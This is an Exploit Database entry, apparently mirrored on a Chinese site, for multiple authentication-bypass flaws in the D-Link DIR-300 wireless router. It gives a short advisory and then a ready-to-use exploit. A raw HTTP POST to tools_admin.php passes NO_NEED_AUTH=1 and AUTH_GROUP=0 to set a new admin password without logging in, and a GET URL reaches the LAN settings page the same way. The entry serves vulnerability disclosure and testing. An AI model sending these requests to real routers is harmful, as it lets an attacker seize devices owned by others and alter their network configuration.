D-Link DIR-300 – Multiple Security Bypass Vulnerabilities

• Exploit Database
• 12 阅读

• 作者： Karol Celia
  日期： 2010-11-09
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/34986/

• source: https://www.securityfocus.com/bid/44743/info
  
  The D-Link DIR-300 wireless router is prone to multiple security-bypass vulnerabilities.
  
  Remote attackers can exploit these issues to bypass security restrictions, access certain administrative functions, alter configuration, and compromise the affected device.
  
  D-Link DIR-300 running firmware 2.01B1, 1.04, 1.05 are vulnerable. Additional models and firmware versions may also be affected. 
  
  POST http://www.example.com:80/tools_admin.php HTTP/1.1
  Host: www.example.com
  Keep-Alive: 115
  Content-Type: application/x-www-form-urlencoded
  Content-length: 0
  
  ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh
  
  
  http://www.example.com/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0